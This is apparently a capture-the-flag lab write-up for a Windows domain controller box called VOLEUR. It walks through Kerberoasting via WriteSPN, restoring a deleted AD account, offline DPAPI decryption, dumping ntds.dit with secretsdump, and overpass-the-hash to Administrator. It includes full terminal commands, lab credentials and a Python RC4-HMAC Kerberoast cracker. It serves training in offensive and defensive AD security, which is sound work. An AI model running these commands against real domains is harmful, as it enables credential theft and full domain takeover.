VOLEUR is a Windows AD DC box chaining WriteSPN Kerberoasting, AD object restoration, DPAPI credential decryption, and offline ntds.dit dumping to achieve full domain compromise.
Difficulty: Hard
OS: Windows (Active Directory / Domain Controller)
IP: 10.129.232.130
Summary
VOLEUR is a Windows Active Directory Domain Controller machine. Starting from known credentials for a low-privileged user (NTLM is disabled on the DC, so every authentication is Kerberos), SMB share enumeration recovers a password-protected Excel file containing service-account passwords and AD access notes. From there a series of AD privilege abuses is chained: WriteSPN → Kerberoasting → AD object restore of a deleted user → DPAPI credential decryption from that user's archived profile → SSH into a Linux subsystem as a backup account with ntds.dit on disk, ultimately yielding full domain compromise via impacket-secretsdump. BloodHound also shows GenericWrite over a second user, but that branch goes nowhere because her Kerberoast hash does not crack.
Enumeration
Nmap
The scan reveals a Domain Controller (hostname DC) for voleur.htb with the usual DC services: DNS, Kerberos, LDAP/LDAPS, SMB, RPC and WinRM on 5985. Two things stand out. First, an OpenSSH 8.2p1 Ubuntu service on port 2222, which means a Linux subsystem or container is co-hosted on the DC (the /mnt/c paths seen later confirm it is WSL). Second, a clock skew of 7h59m55s between the attacker and the DC, which will break Kerberos until the local clock is synced. SMB signing is enabled and required, so NTLM relay is not an option either (and, as the first nxc run shows, NTLM itself is disabled).
Clock Sync
Kerberos rejects requests whose timestamp falls outside the KDC's clock-skew tolerance (5 minutes by default), and the target is nearly 8 hours ahead, so the first step is syncing the local clock against the DC:
The starting credentials are ryan.naylor:HollowOct31Nyt (presumably given as the initial foothold). The first nxc run reports NTLM:False for the DC, so every authentication on this box has to be Kerberos (-k). The spreadsheet recovered later notes that Ryan's account has Kerberos Pre-Authentication disabled, which would make it AS-REP-roastable, but since his password is already known that is not needed here.
nxc can generate a krb5 configuration for the realm with --generate-krb5-file; that run saved the file but then timed out on the share enumeration, so an equivalent /etc/krb5.conf pointing at dc.voleur.htb is written by hand and the enumeration repeated:
SMB Share Enumeration
ryan.naylor has READ on IT, IPC$, NETLOGON and SYSVOL; Finance and HR are listed but not readable. IT is the one worth looking at. Connecting via smbclient:
A file Access_Review.xlsx is retrieved from the share.
Access_Review.xlsx — Credential Intelligence
The Excel file is password-protected (Office 2013 format, 100000 iterations). The hash is extracted with office2john and cracked with john against rockyou in about a second; the password is football1:
The spreadsheet reveals a wealth of information about domain users and service accounts:
User Accounts

User | Job Title | Permissions | Notes
Ryan.Naylor | First-Line Support Technician | SMB | Kerberos Pre-Auth disabled temporarily to test legacy systems
Marie.Bryant | First-Line Support Technician | SMB | -
Lacey.Miller | Second-Line Support Technician | Remote Management Users | -
Todd.Wolfe | Second-Line Support Technician | Remote Management Users | Leaver. Password reset to NightT1meP1dg3on14 and account deleted
Jeremy.Combs | Third-Line Support Technician | Remote Management Users | -
Administrator | Administrator | Domain Admin | Not to be used for daily tasks!

Service Accounts

Account | Permissions | Notes
svc_backup | Windows Backup | Speak to Jeremy!
svc_ldap | LDAP Services | P/W: M1XyC9pW7qT5Vn
svc_iis | IIS Administration | P/W: N5pXyW1VqM?CZ8
svc_winrm | Remote Management | Need to ask Lacey as she reset this recently
This single file yields plaintext passwords for svc_ldap and svc_iis, the reset password of the deleted todd.wolfe account, and the context needed for the rest of the chain: svc_backup is tied to Jeremy, and svc_winrm's password was recently reset by Lacey.
AD Enumeration — svc_ldap
With svc_ldap:M1XyC9pW7qT5Vn the directory can be queried over LDAP (still Kerberos-authenticated). An ldapsearch against the svc_ldap object confirms that its memberOf includes the Restore_Users group, which becomes relevant for the deleted todd.wolfe account later:
BloodHound Graph
Running BloodHound on a collection taken as svc_ldap shows two critical outbound edges from svc_ldap, and the attack paths follow directly:
WriteSPN on svc_winrm → Set a fake SPN → Kerberoast the hash → Crack the password
GenericWrite on lacey.miller → Set a fake SPN → Kerberoast her hash
Lateral Movement 1 — Kerberoasting svc_winrm via WriteSPN
Since svc_ldap has WriteSPN over svc_winrm, a fake SPN can be written to svc_winrm's servicePrincipalName attribute, making the account Kerberoastable; a service ticket for that SPN is then requested and its RC4-encrypted part cracked offline. Two practical points: the SPN value must be unique in the forest or the write is rejected, and it should be removed again once the ticket has been obtained, because an added SPN on a user account is both a detection artifact and a lasting weakness:
Couldn't crack lacey.miller's hash; wouldn't matter anyway, I think.
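To show what the Kerberoast step actually hands to the cracker, and why a hash like Lacey's does not fall to a wordlist that does not contain her password, here is an added example (not code from this page, impacket, john or hashcat) that builds an etype-23 krb5tgs line for a constructed service account and cracks it the way hashcat mode 13100 does: derive the NT hash of each candidate, recompute the RC4-HMAC keys, decrypt, and compare the HMAC-MD5 checksum. The account svc_demo, realm EXAMPLE.HTB, SPN HTTP/fake.example.htb, the password and the wordlist are all made up for the demo.

```python
"""Kerberoast hash format (hashcat 13100 / john krb5tgs) and offline cracking
of an RC4-HMAC (etype 23) service ticket.

Added example for this writeup, not code from the original page, impacket,
john or hashcat. The service account, realm, SPN, password, ticket body and
wordlist below are constructed (nothing from VOLEUR); the cryptography is the
real RC4-HMAC-MD5 profile of RFC 4757 with key usage 2, which is what the
TGS-REP ticket enc-part is encrypted under and what the cracking tools reverse.
"""
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(msg: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is disabled on many OpenSSL 3 builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    padded = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", len(msg) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mix function, additive constant, shift schedule, message-word order)
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(padded), 64):
        X = struct.unpack("<16I", padded[off:off + 64])
        a, b, c, d = h
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                # each step rewrites the "a" slot, then the slots rotate (a,b,c,d) -> (d,a',b,c)
                a, b, c, d = d, rotl((a + fn(b, c, d) + X[k] + const) & MASK, shifts[i % 4]), b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes, usage: int) -> bytes:
    # RFC 4757: K1 = HMAC-MD5(K, little-endian 32-bit key usage)
    return hmac.new(key, struct.pack("<I", usage), "md5").digest()


def rc4hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 encrypt: checksum || RC4(K3, confounder || plaintext)."""
    confounder = confounder or os.urandom(8)
    k1 = _k1(key, usage)
    data = confounder + plaintext
    checksum = hmac.new(k1, data, "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    return checksum + rc4(k3, data)


def krb5tgs_line(user: str, realm: str, spn: str, edata: bytes) -> str:
    """Serialise a ticket enc-part the way GetUserSPNs.py / Rubeus print it for hashcat 13100."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def parse_krb5tgs(line: str):
    head, checksum_hex, edata_hex = line.rsplit("$", 2)
    if not head.startswith("$krb5tgs$23$*"):
        raise ValueError("not an etype-23 krb5tgs line")
    return bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def check_password(line: str, candidate: str) -> bool:
    """One cracking step: derive K3 from the candidate, decrypt, recompute the HMAC."""
    checksum, ciphertext = parse_krb5tgs(line)
    k1 = _k1(nt_hash(candidate), 2)            # key usage 2 = ticket enc-part
    k3 = hmac.new(k1, checksum, "md5").digest()
    plaintext = rc4(k3, ciphertext)
    return hmac.compare_digest(hmac.new(k1, plaintext, "md5").digest(), checksum)


def crack(line: str, wordlist):
    """Return the first wordlist entry that verifies, or None (what john reports as no crack)."""
    return next((w for w in wordlist if check_password(line, w)), None)


# Constructed demo: a fake service account whose password we choose ourselves.
DEMO_PASSWORD = "Winter2025!"
DEMO_TICKET = krb5tgs_line(
    "svc_demo", "EXAMPLE.HTB", "HTTP/fake.example.htb",
    rc4hmac_encrypt(nt_hash(DEMO_PASSWORD), 2, b"\x63\x81\x90\x30\x81\x8d" + b"fake EncTicketPart " * 4),
)
WORDLIST = ["password", "football1", "Summer2024", "Winter2025!", "letmein"]

if __name__ == "__main__":
    print(DEMO_TICKET)
    print("cracked:", crack(DEMO_TICKET, WORDLIST))
```

Each guess costs one MD4, three HMAC-MD5s and one RC4 pass, which is why etype-23 tickets crack orders of magnitude faster than AES ones; when a target account has RC4 allowed, tools request that etype deliberately. The defensive reading is the same: disable RC4 for service accounts, give them long random passwords or gMSAs, and alert on TGS requests with RC4 for accounts that normally use AES.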
Lateral Movement 2 — Restoring the Deleted todd.wolfe Account
The Access_Review spreadsheet noted that todd.wolfe was a leaver whose password was reset to NightT1meP1dg3on14 before the account was deleted. The Restore_Users group membership on svc_ldap implies the ability to restore deleted AD objects.
Locating the Deleted Object
The deleted object GUID is returned:
Restoring via RunasCs
RunasCs.exe is uploaded through the Evil-WinRM session as svc_winrm and used to run Restore-ADObject in the context of svc_ldap, which holds the Restore_Users membership. RunasCs reports "No output received from the process"; that is expected, since Restore-ADObject prints nothing on success, so the result has to be verified by authenticating as the restored user:
The first Kerberos attempt immediately afterwards fails with KDC_ERR_C_PRINCIPAL_UNKNOWN (the restored account is not yet visible to the KDC); after a short delay the retry succeeds, and todd.wolfe authenticates with the password from the spreadsheet:
todd.wolfe has READ on the IT share. Under his archived profile there (Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\), the DPAPI master key file sits in Protect\<user SID>\08949382-134f-4c63-b93c-ce52efc0aa88 and a credential blob in Credentials\772275FAD58525253490A9B0039791D3:
Both files are downloaded via smbclient.
Step 1 — Decrypt the DPAPI Master Key
The master key file is encrypted with a key derived from the user's password and SID. Both are known: the SID is the folder name in the Protect path (S-1-5-21-3927696377-1337352550-2781715495-1110) and the password is NightT1meP1dg3on14 from the spreadsheet, so neither a live session as the user nor the domain DPAPI backup key is needed.
Step 2 — Decrypt the Credential Blob
The decrypted master key unlocks the blob from the Credentials folder, which turns out to hold a saved credential for another domain user:
Credentials: jeremy.combs:qT3V9pLXyN7W4m
The Access_Review spreadsheet tied Jeremy to svc_backup ("Speak to Jeremy!"), so this password is the route to the backup account.
Lateral Movement 3 — jeremy.combs → svc_backup → ntds.dit
Shell as jeremy.combs
With jeremy.combs's password in hand, and the spreadsheet's note tying him to svc_backup, an Evil-WinRM shell is opened as jeremy.combs (he is in Remote Management Users) to look for whatever links him to that account:
SSH Key for svc_backup
Inside C:\IT\Third-Line Support\, an id_rsa private key is found alongside a Note.txt. This key grants SSH access to svc_backup on port 2222 (the Linux subsystem):
Locating ntds.dit
svc_backup, whose spreadsheet entry reads "Windows Backup", lands in the Linux subsystem, where /mnt/c is the DC's C: drive mounted inside WSL and a pre-staged backup of the AD database and registry hives is readable:
All three files are pulled back with scp over port 2222 (ntds.jfm is only the ESE flush map and is not needed), then fed to impacket-secretsdump:
Privilege Escalation — Domain Admin via secretsdump
With ntds.dit plus the SYSTEM hive (which holds the boot key that decrypts the PEK protecting the hashes) and the SECURITY hive, all domain hashes are extracted offline with secretsdump's LOCAL target; nothing has to run on the DC:
The Administrator NT hash is recovered. NTLM is disabled on the target, so the hash cannot be passed over SMB or WinRM directly; instead it is used to request a TGT (overpass-the-hash with getTGT -hashes), and Evil-WinRM authenticates with that ticket:
Attack Chain Summary
Key Techniques
Kerberos-only auth (NTLM disabled on target) — all lateral movement uses -k Kerberos flags
WriteSPN abuse — assigning a fake SPN to a user account to make it Kerberoastable
AD Object Restore — using Restore-ADObject via RunasCs under a group-privileged context
DPAPI offline decryption — master key derived from user password + SID, applied to a credential blob to recover plaintext secrets
Offline ntds.dit dumping — extracting the AD database from a backup rather than running LSASS tools in memory
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ nmap 10.129.232.130 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 03:39 -0400
Nmap scan report for 10.129.232.130
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-11 15:39:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2026-03-11T15:39:50
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 7h59m55s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.59 seconds
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ sudo ntpdate voleur.htb
2026-03-11 11:46:20.923909 (-0400) +28797.386158 +/- 0.079981 voleur.htb 10.129.232.130 s1 no-leap
CLOCK: time stepped by 28797.386158
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ nxc smb 10.129.232.130 -u ryan.naylor -p 'HollowOct31Nyt' --shares -k --generate-krb5-file voleur.krb5
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [+] krb5 conf saved to: voleur.krb5
SMB 10.129.232.130 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=voleur.krb5
SMB 10.129.232.130 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
[11:50:20] ERROR NetBIOSTimeout on target 10.129.232.130: The NETBIOS connection with the remote host timed out. connection.py:185
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ echo '[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = VOLEUR.HTB
[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
admin_server = dc.voleur.htb
default_domain = voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB ' | sudo tee /etc/krb5.conf
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ nxc smb 10.129.232.130 -u ryan.naylor -p 'HollowOct31Nyt' --shares -k
SMB 10.129.232.130 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.232.130 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB 10.129.232.130 445 DC [*] Enumerated shares
SMB 10.129.232.130 445 DC Share Permissions Remark
SMB 10.129.232.130 445 DC ----- ----------- ------
SMB 10.129.232.130 445 DC ADMIN$ Remote Admin
SMB 10.129.232.130 445 DC C$ Default share
SMB 10.129.232.130 445 DC Finance
SMB 10.129.232.130 445 DC HR
SMB 10.129.232.130 445 DC IPC$ READ Remote IPC
SMB 10.129.232.130 445 DC IT READ
SMB 10.129.232.130 445 DC NETLOGON READ Logon server share
SMB 10.129.232.130 445 DC SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ office2john Access_Review.xlsx > hash.txt
┌──(kali㉿kali)-[~/Documents/voleur]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1 (Access_Review.xlsx)
1g 0:00:00:01 DONE (2026-03-11 12:03) 0.5102g/s 408.1p/s 408.1c/s 408.1C/s football1..martha
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> ./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell -c Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'"
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
No output received from the process.
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ impacket-getTGT voleur.htb/todd.wolfe -dc-ip 10.129.232.130
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in todd.wolfe.ccache
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ export KRB5CCNAME=todd.wolfe.ccache
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ nxc smb dc.voleur.htb -u todd.wolfe -p NightT1meP1dg3on14 -d VOLEUR.htb -k --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB dc.voleur.htb 445 dc [-] VOLEUR.htb\todd.wolfe:NightT1meP1dg3on14 KDC_ERR_C_PRINCIPAL_UNKNOWN
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ nxc smb dc.voleur.htb -u todd.wolfe -p NightT1meP1dg3on14 -d VOLEUR.htb -k --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] VOLEUR.htb\todd.wolfe:NightT1meP1dg3on14
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ kinit todd.wolfe@VOLEUR.HTB
Password for todd.wolfe@VOLEUR.HTB:
┌──(kali㉿kali)-[~/Documents/voleur/RunasCs]
└─$ smbclient //dc.voleur.htb/IT -k -no-pass
WARNING: The option -k|--kerberos is deprecated!
Try "help" to get a list of possible commands.
smb: \>
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\> ls
. DS 0 Wed Jan 29 10:13:09 2025
.. DS 0 Wed Jan 29 10:13:09 2025
08949382-134f-4c63-b93c-ce52efc0aa88 A 740 Wed Jan 29 07:53:09 2025
BK-VOLEUR AHS 900 Wed Jan 29 07:53:09 2025
Preferred AHS 24 Wed Jan 29 07:53:09 2025
5311743 blocks of size 4096. 994875 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\> get 08949382-134f-4c63-b93c-ce52efc0aa88
getting file \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88 of size 740 as 08949382-134f-4c63-b93c-ce52efc0aa88 (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
...SNIP
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\> ls
. DS 0 Wed Jan 29 10:13:09 2025
.. D 0 Wed Jan 29 10:13:09 2025
Credentials DSn 0 Wed Jan 29 10:13:09 2025
Crypto DS 0 Wed Jan 29 10:13:09 2025
Internet Explorer D 0 Wed Jan 29 10:13:09 2025
Network D 0 Wed Jan 29 10:13:09 2025
Protect DS 0 Wed Jan 29 10:13:09 2025
Spelling D 0 Sat May 8 04:20:24 2021
SystemCertificates DSn 0 Wed Jan 29 10:13:09 2025
Vault D 0 Wed Jan 29 07:54:04 2025
Windows D 0 Wed Jan 29 10:13:10 2025
5311743 blocks of size 4096. 994411 blocks available
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\> cd Credentials
smb: \Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\> ls
. DSn 0 Wed Jan 29 10:13:09 2025
.. DS 0 Wed Jan 29 10:13:09 2025
772275FAD58525253490A9B0039791D3 An 398 Wed Jan 29 07:55:19 2025
5311743 blocks of size 4096. 994411 blocks available
/mnt/c/IT/Third-Line Support/Backups/
├── Active Directory/
│ ├── ntds.dit
│ └── ntds.jfm
└── registry/
├── SECURITY
└── SYSTEM
┌──(kali㉿kali)-[~/Documents/voleur/last_phase]
└─$ scp -i ../dpapi_phase/id_rsa -P 2222 "[email protected]:/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" ./SECURITY
scp -i ../dpapi_phase/id_rsa -P 2222 "[email protected]:/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" ./SYSTEM
scp -i ../dpapi_phase/id_rsa -P 2222 "[email protected]:/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" ./ntds.dit
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
SECURITY 100% 32KB 44.2KB/s 00:00
SYSTEM 100% 18MB 604.0KB/s 00:29
ntds.dit 100% 24MB 532.5KB/s 00:46
┌──(kali㉿kali)-[~/Documents/voleur/last_phase]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
┌──(kali㉿kali)-[~]
└─$ impacket-getTGT voleur.htb/administrator -hashes :e656e07xxxxxxxxxxxxx60b259ad2 -dc-ip 10.129.232.130
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=administrator.ccache
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
6070xxxxxxxxxxxxxxxxxxxxxxxxxxx5c13